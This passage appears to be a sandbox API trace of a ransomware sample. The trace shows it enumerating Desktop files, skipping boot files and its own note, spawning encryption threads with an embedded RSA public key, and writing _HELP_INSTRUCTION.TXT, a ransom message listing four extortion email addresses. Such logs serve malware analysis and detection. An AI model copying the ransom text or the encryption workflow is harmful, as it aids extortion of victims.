MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.565] lstrcpyW (in: lpString1=0x17cf1c, lpString2="YmOf4LXrg2cAXUtOgh.m4a" | out: lpString1="YmOf4LXrg2cAXUtOgh.m4a") returned="YmOf4LXrg2cAXUtOgh.m4a" [0167.565] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x994 [0167.566] Sleep (dwMilliseconds=0x96) [0167.729] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0167.729] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0167.729] lstrcmpW (lpString1="zexl18m.mp3", lpString2="..") returned 1 [0167.729] lstrcmpW (lpString1="zexl18m.mp3", lpString2=".") returned 1 [0167.729] StrStrW (lpFirst="zexl18m.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0167.729] StrStrW (lpFirst="zexl18m.mp3", lpSrch="ntldr") returned 0x0 [0167.729] StrStrW (lpFirst="zexl18m.mp3", lpSrch="NTLDR") returned 0x0 [0167.729] StrStrW (lpFirst="zexl18m.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0167.729] StrStrW (lpFirst="zexl18m.mp3", lpSrch="ntdetect.com") returned 0x0 [0167.729] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0167.729] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0167.729] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.729] lstrcpyW (in: lpString1=0x17cf1c, lpString2="zexl18m.mp3" | out: lpString1="zexl18m.mp3") returned="zexl18m.mp3" [0167.729] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x97c [0167.729] Sleep (dwMilliseconds=0x96) [0167.877] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0167.877] lstrcmpW (lpString1="ZZFMbf.odt", lpString2="..") returned 1 [0167.877] lstrcmpW (lpString1="ZZFMbf.odt", lpString2=".") returned 1 [0167.877] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0167.877] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="ntldr") returned 0x0 [0167.877] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="NTLDR") returned 0x0 [0167.877] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="NTDETECT.COM") returned 0x0 [0167.877] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="ntdetect.com") returned 0x0 [0167.877] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0167.877] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0167.877] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.877] lstrcpyW (in: lpString1=0x17cf1c, lpString2="ZZFMbf.odt" | out: lpString1="ZZFMbf.odt") returned="ZZFMbf.odt" [0167.877] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x998 [0167.878] WaitForSingleObject (hHandle=0x998, dwMilliseconds=0xffffffff) returned 0x0 [0168.250] Sleep (dwMilliseconds=0x96) [0168.393] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.393] lstrcmpW (lpString1="_av9Cb6IPXGAa5C.mp4", lpString2="..") returned 1 [0168.393] lstrcmpW (lpString1="_av9Cb6IPXGAa5C.mp4", lpString2=".") returned 1 [0168.393] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0168.393] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="ntldr") returned 0x0 [0168.393] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="NTLDR") returned 0x0 [0168.393] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0168.393] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="ntdetect.com") returned 0x0 [0168.394] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0168.394] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0168.394] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.394] lstrcpyW (in: lpString1=0x17cf1c, lpString2="_av9Cb6IPXGAa5C.mp4" | out: lpString1="_av9Cb6IPXGAa5C.mp4") returned="_av9Cb6IPXGAa5C.mp4" [0168.394] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0168.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x99c [0168.394] Sleep (dwMilliseconds=0x96) [0168.548] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0168.548] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0168.548] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0168.548] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0168.548] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0168.548] SetErrorMode (uMode=0x1) returned 0x1 [0168.548] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT") returned 59 [0168.548] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0168.548] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0168.548] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x9a0) returned 0x0 [0168.549] RegQueryValueExW (in: hKey=0x9a0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x469fa0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x469fa0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0168.549] RegCloseKey (hKey=0x9a0) returned 0x0 [0168.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0168.549] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0168.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9a0 [0168.549] WriteFile (in: hFile=0x9a0, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0168.550] CloseHandle (hObject=0x9a0) returned 1 [0168.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0168.550] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0168.550] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0168.550] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0168.550] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.550] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.551] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.551] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.551] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.551] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0168.551] lstrcmpW (lpString1="Ee7G-xHgdwJfqcsImMM", lpString2="..") returned 1 [0168.551] lstrcmpW (lpString1="Ee7G-xHgdwJfqcsImMM", lpString2=".") returned 1 [0168.551] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0168.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0168.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0168.551] SetErrorMode (uMode=0x1) returned 0x1 [0168.551] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0168.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.551] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0168.551] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0168.551] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0168.551] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0168.552] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0168.552] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0168.552] lstrcmpW (lpString1="4BTbVX2SL5PMNXlhJi.m4a", lpString2="..") returned 1 [0168.552] lstrcmpW (lpString1="4BTbVX2SL5PMNXlhJi.m4a", lpString2=".") returned 1 [0168.552] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0168.552] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="ntldr") returned 0x0 [0168.552] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="NTLDR") returned 0x0 [0168.552] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0168.552] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="ntdetect.com") returned 0x0 [0168.552] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned 62 [0168.552] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") [0168.552] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.552] lstrcpyW (in: lpString1=0x17be7c, lpString2="4BTbVX2SL5PMNXlhJi.m4a" | out: lpString1="4BTbVX2SL5PMNXlhJi.m4a") returned="4BTbVX2SL5PMNXlhJi.m4a" [0168.552] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9a4 [0168.552] Sleep (dwMilliseconds=0x96) [0168.704] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0168.704] lstrcmpW (lpString1="BOrtQ-gODoJ96Mp2i.pps", lpString2="..") returned 1 [0168.704] lstrcmpW (lpString1="BOrtQ-gODoJ96Mp2i.pps", lpString2=".") returned 1 [0168.704] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0168.704] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="ntldr") returned 0x0 [0168.704] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="NTLDR") returned 0x0 [0168.704] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", 